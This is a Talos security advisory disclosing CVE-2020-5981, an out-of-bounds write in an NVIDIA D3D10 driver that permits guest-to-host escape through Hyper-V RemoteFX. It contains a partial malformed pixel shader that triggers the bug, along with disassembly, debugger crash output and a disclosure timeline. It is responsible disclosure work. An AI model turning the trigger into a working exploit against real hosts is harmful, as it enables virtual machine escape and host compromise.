Talos Vulnerability Report

TALOS-2020-1036

NVIDIA D3D10 driver nvwgf2umx_cfg.dll nvwg MOV2 code execution vulnerability

August 30, 2020

CVE Number

CVE‑2020‑5981

Summary

An exploitable code execution vulnerability exists in the nvwg MOV2 functionality of NVIDIA D3D10 Driver Version 442.50 - 26.21.14.4250. A specially crafted shader can cause remote code execution. An attacker can use this vulnerability to guest-to-host escape (through Hyper-V RemoteFX).

Tested Versions

NVIDIA D3D10 Driver Version 442.50 - 26.21.14.4250

Product URLs

https://nvidia.com

CVSSv3 Score

8.5 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-787 - Out-of-bounds Write

Details

NVIDIA Graphics drivers is software for NVIDIA Graphics GPU installed on the PC. It is used to communicate between the operating system and the GPU device. This software is required in most cases for the hardware device to function properly.

This vulnerability can be triggered by supplying a malformed pixel shader. This leads to a memory corruption problem in the NVIDIA driver (this driver is mapped to the application - like Hyper-V (rdvgm.exe).

An example of a pixel shader triggering the bug:

ps_4_0
dcl_constantbuffer cb0[4], immediateIndexed
dcl_immediateConstantBuffer 
dcl_input_ps_siv constant v0.xyzw, position
dcl_output o0.xyzw
dcl_temps 9
mov r8.xyz, v0.xyzw
...
sincos r5.x, null, r3.xxxx
mov r3.x, r5.xxxx
mul r3.x, r1.yyyy, r3.xxxx
mul r3.x, r3.xxxx, l(400.000000, 400.000000, 400.000000, 400.000000)
sincos r5.x, null, r3.xxxx
mov r765657091.x, r5.
...

By modifying the mov destination register operand in the mov instruction, an attacker is able to trigger a memory corruption vulnerability in the NVIDIA graphics driver. Attacker can partially control the desitnation address by modifying the shader’s bytecode.

...
00007FFB907A301F | 48 C1 E1 06              | shl rcx,6                               |
00007FFB907A3023 | C1 FE 08                 | sar esi,8                               |	* attacker can control ESI register
00007FFB907A3026 | 8B D6                    | mov edx,esi                             |
00007FFB907A3028 | 48 C1 E2 06              | shl rdx,6                               |
00007FFB907A302C | 42 0F 10 04 31           | movups xmm0,xmmword ptr ds:[rcx+r14]    |
00007FFB907A3031 | 49 03 D6                 | add rdx,r14                             |

...
00007FFB907A3070 | 0F 11 02                 | movups xmmword ptr ds:[rdx],xmm0        |



0:110> r
rax=0000000000000000 rbx=000002020356cf60 rcx=0000000000000380
rdx=00000241ec5a1360 rsi=00000000ffa3000c rdi=00000000000412c0
rip=00007ffb9e2bcf90 rsp=000000541b49ec60 rbp=000000541b49ed60
 r8=0000000000070000  r9=0000000000000001 r10=0000000000000000
r11=0000000000000001 r12=000000000000ff5f r13=0000000000000000
r14=00000202039a1060 r15=00000202032ab300
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
nvwgf2umx_cfg!OpenAdapter12+0x179b40:
00007ffb`9e2bcf90 0f1102          movups  xmmword ptr [rdx],xmm0 ds:00000241`ec5a1360=????????????????????????????????

stack trace:

0:110> kb
 # RetAddr           : Args to Child                                                           : Call Site
00 00007ffb`9e159456 : 00000202`035da140 00000202`03035620 00000202`031a93c0 00000202`03723cd0 : nvwgf2umx_cfg!OpenAdapter12+0x179b40
01 00007ffb`9e15a232 : 00000000`00000000 00000202`03723cd0 00000000`00000000 00000202`037b8a80 : nvwgf2umx_cfg!OpenAdapter12+0x16006
02 00007ffb`9e15b826 : 00000000`00000000 00000000`00000000 00000054`1b49f1a0 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x16de2
03 00007ffb`9e3f978d : 00000202`032ab590 00000202`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x183d6
04 00007ffb`9e46a84d : 00000202`031759a0 00000000`fffffff1 00000000`fffffff1 00000000`fffffff1 : nvwgf2umx_cfg!OpenAdapter12+0x2b633d
05 00007ffb`9f2fc500 : 00000000`00000000 00000000`00000000 00000202`76b634c0 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x3273fd
06 00007ffb`ad127bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!NVAPI_Thunk+0x7cb5d0
07 00007ffb`aed8ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
08 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21

Crash Information

!analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************


KEY_VALUES_STRING: 1

	Key  : AV.Fault
	Value: Write

	Key  : Timeline.OS.Boot.DeltaSec
	Value: 24440

	Key  : Timeline.Process.Start.DeltaSec
	Value: 2162


PROCESSES_ANALYSIS: 1

SERVICE_ANALYSIS: 1

STACKHASH_ANALYSIS: 1

TIMELINE_ANALYSIS: 1

Timeline: !analyze.Start
	Name: <blank>
	Time: 2020-03-16T17:31:33.690Z
	Diff: 690 mSec

Timeline: Dump.Current
	Name: <blank>
	Time: 2020-03-16T17:31:33.0Z
	Diff: 0 mSec

Timeline: Process.Start
	Name: <blank>
	Time: 2020-03-16T16:55:31.0Z
	Diff: 2162000 mSec

Timeline: OS.Boot
	Name: <blank>
	Time: 2020-03-16T10:44:13.0Z
	Diff: 24440000 mSec


DUMP_CLASS: 2

DUMP_QUALIFIER: 0

FAULTING_IP: 
nvwgf2umx_cfg!OpenAdapter12+179b40
00007ffb`9e2bcf90 0f1102          movups  xmmword ptr [rdx],xmm0

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 00007ffb9e2bcf90 (nvwgf2umx_cfg!OpenAdapter12+0x0000000000179b40)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 0000000000000001
   Parameter[1]: 00000241ec5a1360
Attempt to write to address 00000241ec5a1360

FAULTING_THREAD:  00000ba8

PROCESS_NAME:  rdvgm.exe

FOLLOWUP_IP: 
nvwgf2umx_cfg!OpenAdapter12+179b40
00007ffb`9e2bcf90 0f1102          movups  xmmword ptr [rdx],xmm0

WRITE_ADDRESS:  00000241ec5a1360 

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE_STR:  c0000005

EXCEPTION_PARAMETER1:  0000000000000001

EXCEPTION_PARAMETER2:  00000241ec5a1360

WATSON_BKT_PROCSTAMP:  c2ed11f1

WATSON_BKT_PROCVER:  10.0.18362.693

PROCESS_VER_PRODUCT:  Microsoft® Windows® Operating System

WATSON_BKT_MODULE:  nvwgf2umx_cfg.dll

WATSON_BKT_MODSTAMP:  5e543369

WATSON_BKT_MODOFFSET:  30cf90

WATSON_BKT_MODVER:  26.21.14.4250

MODULE_VER_PRODUCT:  NVIDIA D3D10 drivers

BUILD_VERSION_STRING:  18362.1.amd64fre.19h1_release.190318-1202

MODLIST_WITH_TSCHKSUM_HASH:  633b95c9e05d81568106c5eb6d754c627031543d

MODLIST_SHA1_HASH:  87cb7fbfa77a2f9cc0c73fea9f9a68d4ae0be36e

NTGLOBALFLAG:  400

PROCESS_BAM_CURRENT_THROTTLED: 0

PROCESS_BAM_PREVIOUS_THROTTLED: 0

APPLICATION_VERIFIER_FLAGS:  0

PRODUCT_TYPE:  1

SUITE_MASK:  272

DUMP_TYPE:  fe

ANALYSIS_SESSION_HOST:  CLAB

ANALYSIS_SESSION_TIME:  03-16-2020 18:31:33.0690

ANALYSIS_VERSION: 10.0.18362.1 amd64fre

THREAD_ATTRIBUTES: 
OS_LOCALE:  PLK

BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE_EXPLOITABLE

DEFAULT_BUCKET_ID:  INVALID_POINTER_WRITE_EXPLOITABLE

PRIMARY_PROBLEM_CLASS:  APPLICATION_FAULT

PROBLEM_CLASSES: 

	ID:     [0n313]
	Type:   [@ACCESS_VIOLATION]
	Class:  Addendum
	Scope:  BUCKET_ID
	Name:   Omit
	Data:   Omit
	PID:    [Unspecified]
	TID:    [0xba8]
	Frame:  [0] : nvwgf2umx_cfg!OpenAdapter12

	ID:     [0n286]
	Type:   [INVALID_POINTER_WRITE]
	Class:  Primary
	Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
			BUCKET_ID
	Name:   Add
	Data:   Omit
	PID:    [Unspecified]
	TID:    [0xba8]
	Frame:  [0] : nvwgf2umx_cfg!OpenAdapter12

	ID:     [0n117]
	Type:   [EXPLOITABLE]
	Class:  Addendum
	Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
			BUCKET_ID
	Name:   Add
	Data:   Omit
	PID:    [0x440]
	TID:    [0xba8]
	Frame:  [0] : nvwgf2umx_cfg!OpenAdapter12

LAST_CONTROL_TRANSFER:  from 00007ffb9e159456 to 00007ffb9e2bcf90

STACK_TEXT:  
00000054`1b49ec60 00007ffb`9e159456 : 00000202`035da140 00000202`03035620 00000202`031a93c0 00000202`03723cd0 : nvwgf2umx_cfg!OpenAdapter12+0x179b40
00000054`1b49ee10 00007ffb`9e15a232 : 00000000`00000000 00000202`03723cd0 00000000`00000000 00000202`037b8a80 : nvwgf2umx_cfg!OpenAdapter12+0x16006
00000054`1b49efa0 00007ffb`9e15b826 : 00000000`00000000 00000000`00000000 00000054`1b49f1a0 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x16de2
00000054`1b49f0a0 00007ffb`9e3f978d : 00000202`032ab590 00000202`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x183d6
00000054`1b49fb30 00007ffb`9e46a84d : 00000202`031759a0 00000000`fffffff1 00000000`fffffff1 00000000`fffffff1 : nvwgf2umx_cfg!OpenAdapter12+0x2b633d
00000054`1b49fc20 00007ffb`9f2fc500 : 00000000`00000000 00000000`00000000 00000202`76b634c0 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x3273fd
00000054`1b49fc70 00007ffb`ad127bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!NVAPI_Thunk+0x7cb5d0
00000054`1b49fca0 00007ffb`aed8ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
00000054`1b49fcd0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21


THREAD_SHA1_HASH_MOD_FUNC:  cf11ca47cd244828b4bd54f41d1a85654a927900

THREAD_SHA1_HASH_MOD_FUNC_OFFSET:  33ebce64065a7eab7e4ea78fdccda28a11a5bae1

THREAD_SHA1_HASH_MOD:  701c05ef09dbf52b13a73d3e2d555e4906a8342a

FAULT_INSTR_CODE:  4102110f

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  nvwgf2umx_cfg!OpenAdapter12+179b40

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: nvwgf2umx_cfg

IMAGE_NAME:  nvwgf2umx_cfg.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  5e543369

STACK_COMMAND:  ~110s ; .cxr ; kb

FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_EXPLOITABLE_c0000005_nvwgf2umx_cfg.dll!OpenAdapter12

BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_WRITE_EXPLOITABLE_nvwgf2umx_cfg!OpenAdapter12+179b40

FAILURE_EXCEPTION_CODE:  c0000005

FAILURE_IMAGE_NAME:  nvwgf2umx_cfg.dll

BUCKET_ID_IMAGE_STR:  nvwgf2umx_cfg.dll

FAILURE_MODULE_NAME:  nvwgf2umx_cfg

BUCKET_ID_MODULE_STR:  nvwgf2umx_cfg

FAILURE_FUNCTION_NAME:  OpenAdapter12

BUCKET_ID_FUNCTION_STR:  OpenAdapter12

BUCKET_ID_OFFSET:  179b40

BUCKET_ID_MODPRIVATE: 1

BUCKET_ID_MODTIMEDATESTAMP:  5e543369

BUCKET_ID_MODCHECKSUM:  272ca91

BUCKET_ID_MODVER_STR:  26.21.14.4250

BUCKET_ID_PREFIX_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE_EXPLOITABLE_

FAILURE_PROBLEM_CLASS:  APPLICATION_FAULT

FAILURE_SYMBOL_NAME:  nvwgf2umx_cfg.dll!OpenAdapter12

WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/rdvgm.exe/10.0.18362.693/c2ed11f1/nvwgf2umx_cfg.dll/26.21.14.4250/5e543369/c0000005/0030cf90.htm?Retriage=1

TARGET_TIME:  2020-03-16T17:31:37.000Z

OSBUILD:  18363

OSSERVICEPACK:  329

SERVICEPACK_NUMBER: 0

OS_REVISION: 0

OSPLATFORM_TYPE:  x64

OSNAME:  Windows 10

OSEDITION:  Windows 10 WinNt SingleUserTS

USER_LCID:  0

OSBUILD_TIMESTAMP:  unknown_date

BUILDDATESTAMP_STR:  190318-1202

BUILDLAB_STR:  19h1_release

BUILDOSVER_STR:  10.0.18362.1.amd64fre.19h1_release.190318-1202

ANALYSIS_SESSION_ELAPSED_TIME:  10bb

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  um:invalid_pointer_write_exploitable_c0000005_nvwgf2umx_cfg.dll!openadapter12

FAILURE_ID_HASH:  {32968bfd-cb9d-86c1-30b8-ad1954eb9190}

Followup:     MachineOwner
---------

Timeline

2020-03-25 - Vendor Disclosure
2020-04-06 - Vendor requested disclosure extension; Talos granted extension
2020-08-25 - Discussion w/vendor regarding CVE assignment
2020-09-30 - Public Release

Credit

Discovered by Piotr Bania of Cisco Talos.

TALOS-2020-1081

TALOS-2020-0983

Intelligence Center

Vulnerability Information

Security Resources

Media

Company